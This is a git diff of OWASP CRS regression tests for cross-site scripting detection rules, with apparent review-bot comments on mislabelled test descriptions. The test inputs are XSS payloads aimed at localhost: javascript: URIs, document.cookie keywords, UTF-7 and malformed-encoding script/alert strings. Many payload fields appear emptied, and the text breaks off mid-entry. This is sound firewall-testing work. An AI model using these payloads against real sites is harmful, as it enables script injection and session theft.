~ Shell I\n\n" - output: - log_contains: id "941170" + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: '/' + data: "payload=javascript:/*-->" + output: + log_contains: id "941170" + - test_title: 941170-3 + desc: 'Test first backslash match (javascript:(?:[\s\S]+[=\x5c\(\[\.<]) with: javascript: \\\\t (extra backslashes to work around rule transformations)' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/?var=javascript:%20%5C%5C%5C%5Ct' + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + output: + log_contains: id "941170" + - test_title: 941170-4 + desc: 'Test second backslash match (javascript:(?:...|\x5c[ux]\d)) with: javascript:\\\\u0020 (extra backslashes to work around rule transformations)' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/?var=javascript:%5C%5C%5C%5Cu0020' + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + output: + log_contains: id "941170" + - test_title: 941170-5 + desc: "Status Page Test - data: , as GET variable" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/?test=%20data%3A%20%2C%20%3Cx%3E' + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + output: + log_contains: id "941170" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index d6dd71ab05..7d8531cb83 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml 
@@ -1,58 +1,119 @@ --- - meta: - author: "zmallen" - enabled: true - name: "941180.yaml" - description: "Tests to trigger, or not trigger 941180" - tests: - - - test_title: 941180-1 - desc: Node-validator blacklist keywords, ARGS - stages: - - - stage: +meta: + author: "zmallen" + enabled: true + name: "941180.yaml" + description: "Tests to trigger, or not trigger 941180" +tests: + - test_title: 941180-1 + desc: Node-validator deny list keywords, ARGS + stages: + - stage: input: dest_addr: 127.0.0.1 - method: GET + method: POST port: 80 uri: '/foo' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: '941180-1=window.location' output: log_contains: id "941180" - - - test_title: 941180-2 - desc: Node-validator blacklist keywords, ARGS_NAMES - stages: - - - stage: + - test_title: 941180-2 + desc: Node-validator deny list keywords, ARGS_NAMES + stages: + - stage: input: dest_addr: 127.0.0.1 - method: GET + method: POST port: 80 uri: '/bar' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: 'document.cookie=941180-2' output: log_contains: id "941180" - - - test_title: 941180-3 - desc: Node-validator blacklist keywords, ARGS_NAMES - stages: - - - stage: + - test_title: 941180-3 + desc: Node-validator deny list keywords, ARGS_NAMES + stages: + - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: '/baz' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost Cookie: 'window.location=941180-3' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "941180" + - test_title: 941180-4 + desc: Negative test for 
Node-validator deny list keyword -->, present in stricter sibling 941181, ARGS + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: '/foo' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-4=-->' + output: + no_log_contains: id "941180" + - test_title: 941180-5 + desc: "XSS with embedded shell execution attempt (batch script)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\"-->'-->`-->" + version: HTTP/1.0 output: log_contains: id "941180" + - test_title: 941180-6 + desc: "Node-validator deny list keywords, ARGS, issue #2512" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: '/bar' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'arg=...(document.domain)...' + output: + log_contains: id "941180" + - test_title: 941180-7 + desc: "We should not trigger on REQUEST_FILENAME without special characters" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/javascript-manual/document.cookie' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + no_log_contains: id "941180" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml new file mode 100644 index 0000000000..aefed2faa0 --- /dev/null 
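Review bot: The description of the new test 941180-5, `XSS with embedded shell execution attempt (batch script)`, does not describe its payload `var=\"-->'-->`-->`, which is a comment-close sequence prefixed by a double quote, a single quote and a backtick, and it sits right after 941180-4, which asserts that a bare `-->` must not trigger 941180. From the two descriptions alone a reader cannot tell why one case is positive and the other negative; presumably the quote/backtick prefix is what the rule keys on, but that is only inferable from the payloads. I'd replace the desc with something that names the payload, e.g. `desc: "Comment-close sequences prefixed with a double quote, single quote and backtick (bare --> is the negative case 941180-4 and the stricter sibling 941181)"`.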
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml @@ -0,0 +1,71 @@ +--- +meta: + author: "Paul Beckett" + enabled: true + name: "941181.yaml" + description: "Tests to trigger, or not trigger 941180" +tests: + - test_title: 941181-1 + desc: Node-validator deny list keywords, ARGS + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: '/foo' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=-->' + output: + log_contains: id "941181" + - test_title: 941181-2 + desc: Node-validator deny list keywords, ARGS + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: '/foo' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=--%3E' + output: + log_contains: id "941181" + - test_title: 941181-3 + desc: Node-validator deny list keywords, ARGS_NAMES + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: '/bar' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '-->=941181-3' + output: + log_contains: id "941181" + - test_title: 941181-4 + desc: Node-validator deny list keywords, ARGS_NAMES + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/baz' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '-->=941181-4' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "941181" 
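Review bot: The new file's `description` reads `Tests to trigger, or not trigger 941180` although every test in it asserts `log_contains: id "941181"`; it should be `description: "Tests to trigger, or not trigger 941181"`. In the same hunk, test 941181-2 sends `data: '941181-1=--%3E'`, reusing the parameter name of test 941181-1, so the two requests are not distinguishable in the server log when one of them fails; `data: '941181-2=--%3E'` follows the convention the rest of the file uses. Both look like copy-paste slips rather than behavioural defects.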
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index ffe9e90e57..6d17e269c5 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml 
@@ -1,58 +1,87 @@ --- - meta: - author: "csanders-git" - enabled: true - name: "941190.yaml" - description: "Tests to trigger, or not trigger 941190" - tests: - - - test_title: 941190-1 - desc: Node-validator blacklist keywords, ARGS - stages: - - - stage: +meta: + author: "csanders-git" + enabled: true + name: "941190.yaml" + description: "Tests to trigger, or not trigger 941190" +tests: + - test_title: 941190-1 + desc: Node-validator deny list keywords, ARGS + stages: + - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: '/foo' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "941190-1=" output: log_contains: id "941190" - - - test_title: 941190-2 - desc: Node-validator blacklist keywords, ARGS_NAMES - stages: - - - stage: + - test_title: 941190-2 + desc: Node-validator deny list keywords, ARGS_NAMES + stages: + - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: '/bar' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "x=" output: log_contains: id "941190" - - - test_title: 941190-3 - desc: Node-validator blacklist keywords, COOKIES_NAMES - stages: - - - stage: + - test_title: 941190-3 + desc: Node-validator deny list keywords, COOKIES_NAMES + stages: + - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: '/baz' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost Cookie: '' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "941190" + - test_title: 941190-4 + desc: Test first replaced backslash match (\x5c) + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: 
GET + port: 80 + uri: '/' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: 'My-Cookie=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941230" - - - test_title: 941230-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941230" + - test_title: 941230-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941230" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941230" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index 9fa5b886a5..7cda4273d9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml 
@@ -1,23 +1,39 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941240.yaml - tests: - - - test_title: 941240-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941240.yaml +tests: + - test_title: 941240-1 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=%3c%3fimport%20implementation%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941240" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%3c%3fimport%20implementation%20%3d" + version: HTTP/1.0 + output: + log_contains: id "941240" + - test_title: 941240-2 + desc: "Status Page Test - IE XSS Filter " - version: HTTP/1.0 - output: - log_contains: id "941250" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941250" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index 1ded21752e..176a4f18fd 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml 
@@ -1,39 +1,39 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941260.yaml - tests: - - - test_title: 941260-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941260.yaml +tests: + - test_title: 941260-1 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941260" - - - test_title: 941260-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941260" + - test_title: 941260-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" - version: HTTP/1.0 - output: - log_contains: id "941260" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" + version: HTTP/1.0 + output: + log_contains: id "941260" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index 144af883f8..abb31377cc 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml 
@@ -1,40 +1,40 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941270.yaml - tests: - - - test_title: 941270-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941270.yaml +tests: + - test_title: 941270-1 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" - version: HTTP/1.0 - output: - log_contains: id "941270" - - - test_title: 941270-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" + version: HTTP/1.0 + output: + log_contains: id "941270" + - test_title: 941270-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - version: HTTP/1.0 - data: 'payload=' - output: - log_contains: id "941270" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + data: 'payload=' + output: + log_contains: id "941270" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index ef70421455..c591cfe647 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml 
@@ -1,44 +1,43 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941280.yaml - tests: - - - test_title: 941280-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941280.yaml +tests: + - test_title: 941280-1 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941280" - - - test_title: 941280-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" + version: HTTP/1.0 + output: + log_contains: id "941280" + - test_title: 941280-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Length: 113 - User-Agent: ModSecurity CRS 3 Tests - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/" - version: HTTP/1.0 - data: 'payload=xssxss&var=whatever" - version: HTTP/1.0 - output: - log_contains: id "941290" - - - test_title: 941290-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=&var=whatever" + version: HTTP/1.0 + output: + log_contains: id "941290" + - test_title: 941290-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941290" + - stage: + input: + dest_addr: 127.0.0.1 + headers: 
+ Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941290" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index b67b452750..53a827d4e0 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml 
@@ -1,40 +1,40 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941300.yaml - tests: - - - test_title: 941300-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941300.yaml +tests: + - test_title: 941300-1 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?%3cOBJECT%20data%20%3d=sdffdsa" - version: HTTP/1.0 - output: - log_contains: id "941300" - - - test_title: 941300-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?%3cOBJECT%20data%20%3d=sdffdsa" + version: HTTP/1.0 + output: + log_contains: id "941300" + - test_title: 941300-2 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - version: HTTP/1.0 - data: "payload=" - output: - log_contains: id "941300" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + data: "payload=" + output: + log_contains: id "941300" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml index c1cb35185b..a033b90be7 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml 
@@ -1,75 +1,215 @@ --- - meta: - author: Christian S.J. Peron, Federico G. Schwindt - description: US-ASCII Malformed Encoding XSS Filter - enabled: true - name: 941310.yaml - tests: - - - test_title: 941310-1 +meta: + author: Christian S.J. Peron, Federico G. Schwindt + description: US-ASCII Malformed Encoding XSS Filter + enabled: true + name: 941310.yaml +tests: + - test_title: 941310-1 desc: Positive test using single byte stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-type: us-ascii - method: POST - port: 80 - uri: / - data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe - output: - log_contains: id "941310" - - - test_title: 941310-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe + output: + log_contains: id "941310" + - test_title: 941310-2 desc: Positive test using utf-8 stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-type: us-ascii - method: POST - port: 80 - uri: / - data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe - output: - log_contains: id "941310" - - - test_title: 941310-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe + output: + log_contains: id "941310" + - test_title: 941310-3 + desc: Positive test using alternate utf-8 + stages: + - 
stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe + output: + log_contains: id "941310" + - test_title: 941310-4 + desc: Real world false positive for old rule with Russian utf-8 characters + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + output: + no_log_contains: id "941310" + - test_title: 941310-5 + desc: Real world false positive for old rule with German utf-8 characters + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" + data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt + output: + no_log_contains: id "941310" + - test_title: 
941310-6 desc: Negative test for opening tag stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-type: us-ascii - method: POST - port: 80 - uri: / - data: var=\xbc\xbc - output: - no_log_contains: id "941310" - - - test_title: 941310-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xbc\xbc + output: + no_log_contains: id "941310" + - test_title: 941310-7 desc: Negative test for closing tag stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-type: us-ascii - method: POST - port: 80 - uri: / - data: var=\xbe\xbe - output: - no_log_contains: id "941310" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xbe\xbe + output: + no_log_contains: id "941310" + - test_title: 941310-8 + desc: Negative for missing end tag, opening tag + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 + output: + no_log_contains: id "941310" + - test_title: 941310-9 + desc: Negative for missing end tag, closing tag + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost 
+ Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe + output: + no_log_contains: id "941310" + - test_title: 941310-10 + desc: Negative using real world Russian example in utf-8 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + output: + no_log_contains: id "941310" + - test_title: 941310-11 + desc: Negative using real world Russian example in utf-8, variant + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: 